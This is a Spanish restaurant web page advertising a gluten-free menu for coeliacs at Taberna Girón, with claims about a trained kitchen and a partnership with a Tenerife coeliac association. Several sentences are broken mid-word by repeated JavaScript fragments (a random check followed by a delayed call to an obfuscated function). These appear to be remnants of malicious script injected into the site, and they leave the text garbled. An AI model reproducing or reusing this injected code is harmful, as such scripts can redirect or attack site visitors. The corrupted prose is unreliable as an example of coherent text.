Menús para celíacos


menuceliacos

Disponemos de carta adaptada para celíacos.

Cada vez más personas son diagnosticadas como celíacas, es decir, que sus cuerpos no tienen tolerancia a los alimentos que contienen gluten.

El gluten puede estar presente en muchos más alimentos de los que todom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dos damos por hecho, es decir, los que llevan harina, si no se lleva a cabo una correcta manipulación de los mismos.

Taberna Girón resulta una opción mucho más cómoda y segura para los celíacos dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donde garantizamos que para elaborar nuestros platos la cocina se encuentra perfectamente habilitada y el personal formadom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do para que no se mezclen los alimentos.

|Hemos firmadom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do un convenio de colaboración con la Asociación de Celíacos de Tenerife y hemos recibidom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do formación sobre preparación y manipulación de alimentos sin gluten.